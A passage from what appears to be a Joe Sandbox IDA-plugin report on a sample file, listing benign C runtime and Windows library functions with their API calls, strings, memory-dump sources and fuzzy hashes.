Instruction Fuzzy Hash: 72114F32A1A74282EA98AF69E4D17B873A1FF44754F084139EB4D83795DF3CE850CB01

Function 00007FF6B40A38BC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(?,?,000000FF,00007FF6B40A3905,?,?,00000028,00007FF6B40A5D71,?,?,00000000,00007FF6B40A6748,?,?,00000000,00007FF6B40A5B2D), ref: 00007FF6B40A38CB
GetProcAddress.KERNEL32(?,?,000000FF,00007FF6B40A3905,?,?,00000028,00007FF6B40A5D71,?,?,00000000,00007FF6B40A6748,?,?,00000000,00007FF6B40A5B2D), ref: 00007FF6B40A38E0

Strings

CorExitProcess, xrefs: 00007FF6B40A38D6
mscoree.dll, xrefs: 00007FF6B40A38C4

Memory Dump Source

Source File: 00000006.00000002.4146867541.00007FF6B40A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6B40A0000, based on PE: true

Associated: 00000006.00000002.4146851129.00007FF6B40A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4146885168.00007FF6B40AB000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4146901761.00007FF6B40AF000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4146915321.00007FF6B40B3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff6b40a0000_8pIuMUYQX9q.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 1646373207-1276376045
Opcode ID: b6940a6a45202d71aff9ffdbc5598b1ca163201d0251a3ef9ccef4341afc100e
Instruction ID: 0d21ec3bb749b4f87121c820741116787f1c2fa613e3732231ac064c771e6739
Opcode Fuzzy Hash: b6940a6a45202d71aff9ffdbc5598b1ca163201d0251a3ef9ccef4341afc100e
Instruction Fuzzy Hash: B9E01210F0570742FE199F98A8C453813A09F48701F586039CB2EC6390EE7CE589C300

Function 00007FFE1A525B00 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 00007FFE1A525B7F
WriteFile.KERNEL32 ref: 00007FFE1A525E47
WriteFile.KERNEL32 ref: 00007FFE1A525E8D
GetLastError.KERNEL32 ref: 00007FFE1A525F43

Memory Dump Source

Source File: 00000006.00000002.4146952377.00007FFE1A511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000006.00000002.4146936865.00007FFE1A510000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146976807.00007FFE1A534000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146994186.00007FFE1A544000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4147012335.00007FFE1A547000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffe1a510000_8pIuMUYQX9q.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
Opcode ID: 5048c76266eb3313ee64d48c8931c955805d48b3a4794dade491924fc2e94726
Instruction ID: c7440096d7362b6c9cd275d06e218258fd0a045abe0417b7fba6e5510694405e
Opcode Fuzzy Hash: 5048c76266eb3313ee64d48c8931c955805d48b3a4794dade491924fc2e94726
Instruction Fuzzy Hash: 12D1C272B08A4189E711CFB6D4402BC37B6EB56BA8B4441B7DE5E97BA9DE3CD506C300

Function 00007FFE1A5264C0 Relevance: 6.2, APIs: 4, Instructions: 219COMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleMode.KERNEL32(?,?,?,?,?,00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00007FFE1A531605), ref: 00007FFE1A5265DC
GetLastError.KERNEL32(?,?,?,?,?,00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00007FFE1A531605), ref: 00007FFE1A526667

Memory Dump Source

Source File: 00000006.00000002.4146952377.00007FFE1A511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000006.00000002.4146936865.00007FFE1A510000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146976807.00007FFE1A534000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146994186.00007FFE1A544000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4147012335.00007FFE1A547000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffe1a510000_8pIuMUYQX9q.jbxd

Similarity

API ID: ConsoleErrorLastMode
String ID:
API String ID: 953036326-0
Opcode ID: c3034807fe45e13b1273f576a7662f24430937145c62c75b159e527ba700d642
Instruction ID: 5ef001beca30e28fb225de9e258b5e08ec63e80b979a373d31f4f980414fe73b
Opcode Fuzzy Hash: c3034807fe45e13b1273f576a7662f24430937145c62c75b159e527ba700d642
Instruction Fuzzy Hash: CB91C462F0CA51C5F7508FA694802BD2BA2FB56FA8F1441FBDE0E57AA5DE38E441C710

Function 000000018005C2D8 Relevance: 6.2, APIs: 4, Instructions: 159COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 000000018005C319
_invalid_parameter_noinfo.LIBCMT ref: 000000018005C399
_invalid_parameter_noinfo.LIBCMT ref: 000000018005C3ED
_get_daylight.LIBCMT ref: 000000018005C445

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID: _invalid_parameter_noinfo$_get_daylight
String ID:
API String ID: 72036449-0
Opcode ID: 524428e5e79687aa4ae072e0d8c9792fe21fc2f4d29fdc25a47a9132e6b9a0f8
Instruction ID: bc5fdf758b65a675098a606c2cc236452f03925281c9712176af468eb5f4d984
Opcode Fuzzy Hash: 524428e5e79687aa4ae072e0d8c9792fe21fc2f4d29fdc25a47a9132e6b9a0f8
Instruction Fuzzy Hash: 3551B33260060C8EF7EB4A289515BFD6690E74C7D8F19C425BA45772D6CE3ACF488B43

Function 000000018003621C Relevance: 6.1, APIs: 4, Instructions: 53COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32 ref: 0000000180036265
GetLastError.KERNEL32 ref: 0000000180036273
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,000000018001E024), ref: 00000001800362A8
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,000000018001E024), ref: 00000001800362B6

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID: ByteCharErrorLastMultiWide
String ID:
API String ID: 203985260-0
Opcode ID: b38832a5a4ed5b0bef4e65de44d3f2244aa27d95998e58158c008334a842068c
Instruction ID: 33f887d84547fce61003a7889d65a9c9b58a72703209ceaa5c657e5639861c0b
Opcode Fuzzy Hash: b38832a5a4ed5b0bef4e65de44d3f2244aa27d95998e58158c008334a842068c
Instruction Fuzzy Hash: 81214D72614B8887E7A18F12E84435FBBB4F79DBD4F258128EB8957B64DF38C5498B00

Function 00007FF6B40A2EA4 Relevance: 6.0, APIs: 4, Instructions: 44COMMON

Download Yara Rule

APIs

FlsFree.KERNEL32(?,?,?,?,00007FF6B40A31D9,?,?,00000000,00007FF6B40A1A6A), ref: 00007FF6B40A2EB3
DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6B40A31D9), ref: 00007FF6B40A5A66
free.LIBCMT ref: 00007FF6B40A5A6F
DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6B40A31D9), ref: 00007FF6B40A5A8F

Memory Dump Source

Source File: 00000006.00000002.4146867541.00007FF6B40A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6B40A0000, based on PE: true

Associated: 00000006.00000002.4146851129.00007FF6B40A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4146885168.00007FF6B40AB000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4146901761.00007FF6B40AF000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4146915321.00007FF6B40B3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff6b40a0000_8pIuMUYQX9q.jbxd

Similarity

API ID: CriticalDeleteSection$Freefree
String ID:
API String ID: 1250194111-0
Opcode ID: 560bd812eb3c7989182bdf048476a541ebec4a126c21a02dfd4bf752f1d9f148
Instruction ID: 2d6270a0906077dfa2145b7f193bdd4c0e15e10b83989a2794fc018cacf9975a
Opcode Fuzzy Hash: 560bd812eb3c7989182bdf048476a541ebec4a126c21a02dfd4bf752f1d9f148
Instruction Fuzzy Hash: 73115A31F0AA42C6FA148F19E4D417C7360FF68B94F584235DB6D86AA9CF2CE492CB01

Function 00007FF6B40A9E4C Relevance: 6.0, APIs: 4, Instructions: 42COMMON

Download Yara Rule

APIs

_errno.LIBCMT ref: 00007FF6B40A9E61

Part of subcall function 00007FF6B40A3314: DecodePointer.KERNEL32 ref: 00007FF6B40A333B

_flush.LIBCMT ref: 00007FF6B40A9E8A
_freebuf.LIBCMT ref: 00007FF6B40A9E94

Memory Dump Source

Source File: 00000006.00000002.4146867541.00007FF6B40A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6B40A0000, based on PE: true

Associated: 00000006.00000002.4146851129.00007FF6B40A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4146885168.00007FF6B40AB000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4146901761.00007FF6B40AF000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4146915321.00007FF6B40B3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff6b40a0000_8pIuMUYQX9q.jbxd

Similarity

API ID: DecodePointer_errno_flush_freebuf
String ID:
API String ID: 1889905870-0
Opcode ID: da7932e52bb782b2ea680600a52612edcae9edfa5df0e1a494ca3e2807df4e33
Instruction ID: a52ba1ed3ad4363ea7af994b63d4fdea75f6ea5e762926d0da4f7452f79149cb
Opcode Fuzzy Hash: da7932e52bb782b2ea680600a52612edcae9edfa5df0e1a494ca3e2807df4e33
Instruction Fuzzy Hash: 73019A22F1C64346FF24EFBD949237A62A19F95768F294B30EB59C61D3DE3CE8118640

Function 00007FFE1A517648 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FFE1A517674
GetCurrentThreadId.KERNEL32 ref: 00007FFE1A517682
GetCurrentProcessId.KERNEL32 ref: 00007FFE1A51768E
QueryPerformanceCounter.KERNEL32 ref: 00007FFE1A51769E

Memory Dump Source

Source File: 00000006.00000002.4146952377.00007FFE1A511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000006.00000002.4146936865.00007FFE1A510000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146976807.00007FFE1A534000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146994186.00007FFE1A544000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4147012335.00007FFE1A547000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffe1a510000_8pIuMUYQX9q.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 84e71639bdd42f26a39d7708def930c51062db8ce9a96d7c9242dda2b84db88b
Instruction ID: b429c755d1384e62d9b31eda33aeb67922181e7e84169d62cbde6809a6397748
Opcode Fuzzy Hash: 84e71639bdd42f26a39d7708def930c51062db8ce9a96d7c9242dda2b84db88b
Instruction Fuzzy Hash: 91112126B18F018AEB00CF61F8542B837B4FB5AB68F440D76DA6D47765EF78D1648340

Function 00007FF6B40A965C Relevance: 6.0, APIs: 4, Instructions: 36COMMONLIBRARYCODE

Download Yara Rule

APIs

__doserrno.LIBCMT ref: 00007FF6B40A9665
_errno.LIBCMT ref: 00007FF6B40A966D

Memory Dump Source

Source File: 00000006.00000002.4146867541.00007FF6B40A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6B40A0000, based on PE: true

Associated: 00000006.00000002.4146851129.00007FF6B40A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4146885168.00007FF6B40AB000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4146901761.00007FF6B40AF000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4146915321.00007FF6B40B3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff6b40a0000_8pIuMUYQX9q.jbxd

Similarity

API ID: __doserrno_errno
String ID:
API String ID: 921712934-0
Opcode ID: e9ed2e9d67157f8eabff317635854fc7692ffbd0cf0b3e8909c87aa4bdf9adde
Instruction ID: 0130d518efd8e4f9d7161979bbcfdd108d7c1c9d8ddbf08aacb162f1e8c35976
Opcode Fuzzy Hash: e9ed2e9d67157f8eabff317635854fc7692ffbd0cf0b3e8909c87aa4bdf9adde
Instruction Fuzzy Hash: BE012F62F1C64241FA055F7CC4C237C76A19F90720F548335DB2D827D2CF3C60018A11

Function 00007FFE1A513B60 Relevance: 6.0, APIs: 4, Instructions: 28windowCOMMON

Download Yara Rule

APIs

GetMessageW.USER32 ref: 00007FFE1A513B80
TranslateMessage.USER32 ref: 00007FFE1A513B95
DispatchMessageW.USER32 ref: 00007FFE1A513BA0
GetMessageW.USER32 ref: 00007FFE1A513BB3

Memory Dump Source

Source File: 00000006.00000002.4146952377.00007FFE1A511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000006.00000002.4146936865.00007FFE1A510000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146976807.00007FFE1A534000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146994186.00007FFE1A544000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4147012335.00007FFE1A547000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffe1a510000_8pIuMUYQX9q.jbxd

Similarity

API ID: Message$DispatchTranslate
String ID:
API String ID: 1706434739-0
Opcode ID: ce43b8652eb15e056c7d71be4dd5242c93621fdbd0f97818f5ded2351bfdf095
Instruction ID: 766e0f87f36b30a5b8e155bf5091e74a3813b7a18cfec8572bbee539b49f5586
Opcode Fuzzy Hash: ce43b8652eb15e056c7d71be4dd5242c93621fdbd0f97818f5ded2351bfdf095
Instruction Fuzzy Hash: A8F0812AB1CD4282F6209B22F8656366760FFDAB28F8080B2E54D47935EE3CD105CB00

Function 00000001800546B0 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 236COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 0000000180054712

Strings

25-11 C1, xrefs: 00000001800546B9

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: 25-11 C1
API String ID: 3215553584-2243052442
Opcode ID: 553320aff9e7b6fbec3cacfe7805a7bf9c814d412d21e28b9a9eefa8ab688b83
Instruction ID: 49919ef4ccdc87e4908c8f796bf825f9d671d68fef63d9657fa71390145d45fa
Opcode Fuzzy Hash: 553320aff9e7b6fbec3cacfe7805a7bf9c814d412d21e28b9a9eefa8ab688b83
Instruction Fuzzy Hash: BDA1D63371564889FBA28B6194413EE23A5B74D7ECF148721FE562BAC4DF35CA59C300

Function 000000018003D808 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 163COMMONLIBRARYCODE

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000000018003D832

Strings

csm, xrefs: 000000018003D9C6
csm, xrefs: 000000018003D857

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID: __except_validate_context_record
String ID: csm$csm
API String ID: 1467352782-3733052814
Opcode ID: f2f879476b8d46476efd416d8cee7b3fefc27cc29c7e24fa25564f617b602d69
Instruction ID: 3c548887e775cd8c26a90dee61bf94af8d1ad70771c34c220544f4289c97cdaf
Opcode Fuzzy Hash: f2f879476b8d46476efd416d8cee7b3fefc27cc29c7e24fa25564f617b602d69
Instruction Fuzzy Hash: 7E71B47220468886DBA38F25E5907AE7BA1F349BC8F16C117FE8847A89CF38C655C741

Function 00007FFE1A51C0C0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 163COMMONLIBRARYCODE

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FFE1A51C0EA

Strings

csm, xrefs: 00007FFE1A51C10F
csm, xrefs: 00007FFE1A51C27E

Memory Dump Source

Source File: 00000006.00000002.4146952377.00007FFE1A511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000006.00000002.4146936865.00007FFE1A510000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146976807.00007FFE1A534000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146994186.00007FFE1A544000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4147012335.00007FFE1A547000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffe1a510000_8pIuMUYQX9q.jbxd

Similarity

API ID: __except_validate_context_record
String ID: csm$csm
API String ID: 1467352782-3733052814
Opcode ID: 9ae87aa7eb36bc854993421b301cfcd970760cc834bcdba334f6f5f9de077523
Instruction ID: 59bdc003d54a5e2284ba209bc524689fc864bcc472fd005a639d9ea6ce64bac1
Opcode Fuzzy Hash: 9ae87aa7eb36bc854993421b301cfcd970760cc834bcdba334f6f5f9de077523
Instruction Fuzzy Hash: 2971A572B0CA8186DB608B66A44077D7BA2FB42FA9F1481F6EE8D47A95CF3DD451C700

Function 0000000180021700 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 152COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00000001800218E6
Concurrency::cancel_current_task.LIBCPMT ref: 00000001800218EC

Strings

ios_base::badbit set, xrefs: 0000000180021700

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
String ID: ios_base::badbit set
API String ID: 73155330-3882152299
Opcode ID: 57dd9cebe5159a5a4ed97422524d8a1f2edc9131b151b30e6a472cf78d787d3b
Instruction ID: ffab25a970d620f04549ac02c795302ec7ad840944c68286647cf9c064265aa5
Opcode Fuzzy Hash: 57dd9cebe5159a5a4ed97422524d8a1f2edc9131b151b30e6a472cf78d787d3b
Instruction Fuzzy Hash: 89415872315B9C49E893AA63AA443EA6791B75DFD4F54C621BE5E13FC5CE38C309A300

Function 000000018003FB30 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 151COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 000000018003FB6B
_invalid_parameter_noinfo.LIBCMT ref: 000000018003FD3A

Strings

, xrefs: 000000018003FCB7

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-3916222277
Opcode ID: 80fb916a70103289eb9b57913fe14c9e774f61c4be20f65014959ab2e0e3d3cf
Instruction ID: 393e31f40c7a38e67f4dd12484e424e5947e81aa6911986cdd4a050e3b2b1304
Opcode Fuzzy Hash: 80fb916a70103289eb9b57913fe14c9e774f61c4be20f65014959ab2e0e3d3cf
Instruction Fuzzy Hash: 0061957216461C86E7FB8F2881543FE37A5F30DBC8F26A116EE4646394CF22C649C700

Function 000000018003F91C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 149COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 000000018003F949
_invalid_parameter_noinfo.LIBCMT ref: 000000018003F97C

Strings

, xrefs: 000000018003FACA

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-3916222277
Opcode ID: fe6277cedfc2792dec5301d0ba4f7f2ea60826255b3f679e271855a12d26ca79
Instruction ID: 13c5d3894a1d4ff7859c5465c9aaa29bcf89663a43d4a417c96ebcf15d448208
Opcode Fuzzy Hash: fe6277cedfc2792dec5301d0ba4f7f2ea60826255b3f679e271855a12d26ca79
Instruction Fuzzy Hash: FA61A872104A488AE7F78F24C4543FE37A1F309B99F169116EA4A463D9CF76C64DC702

Function 000000018004BBD0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 000000018004BC13

Strings

gfff, xrefs: 000000018004BD35
e+000, xrefs: 000000018004BCB8

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: e+000$gfff
API String ID: 3215553584-3030954782
Opcode ID: 96e2cb4baedf61b32dc3edb23e2593214523b7d62dabe0fec08277be6cd1692c
Instruction ID: a7c336dbbab1b81b9ab601974a2db101132f6a0c69056ab11a0bd76865d7c724
Opcode Fuzzy Hash: 96e2cb4baedf61b32dc3edb23e2593214523b7d62dabe0fec08277be6cd1692c
Instruction Fuzzy Hash: E3515972714BC886E7A68F3998C13D97B91E385BD4F09D261E7A887BD5DF28C148C700

Function 00007FFE1A51C758 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FFE1A51C802
_CreateFrameInfo.LIBVCRUNTIME ref: 00007FFE1A51C82B

Strings

csm, xrefs: 00007FFE1A51C92B

Memory Dump Source

Source File: 00000006.00000002.4146952377.00007FFE1A511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000006.00000002.4146936865.00007FFE1A510000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146976807.00007FFE1A534000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146994186.00007FFE1A544000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4147012335.00007FFE1A547000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffe1a510000_8pIuMUYQX9q.jbxd

Similarity

API ID: CreateFrameInfo__except_validate_context_record
String ID: csm
API String ID: 2558813199-1018135373
Opcode ID: 31ad837d6f4daa38a7c34588ddb2731142bf74f241e86b60f7215f0df8321493
Instruction ID: e8510676542b995761a806765c5d22a1dd3ae805a9583f22861322723c34495c
Opcode Fuzzy Hash: 31ad837d6f4daa38a7c34588ddb2731142bf74f241e86b60f7215f0df8321493
Instruction Fuzzy Hash: 1E515C7361CB9286D621AB16A44027D77A5F78ABA0F1001B6DB8D07B65DF3CE491CB00

Function 000000018003DE38 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 117COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000000018003DEE2
_CreateFrameInfo.LIBVCRUNTIME ref: 000000018003DF0E

Strings

csm, xrefs: 000000018003E00E

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID: CreateFrameInfo__except_validate_context_record
String ID: csm
API String ID: 2558813199-1018135373
Opcode ID: 6975d577c862f0ba591d8799f34c43f82ab62547a4325fd1b7526362f03347a5
Instruction ID: 2e784f8d29d817af8750a2f64a5013415b287de5eb34481d8443924441f72a8c
Opcode Fuzzy Hash: 6975d577c862f0ba591d8799f34c43f82ab62547a4325fd1b7526362f03347a5
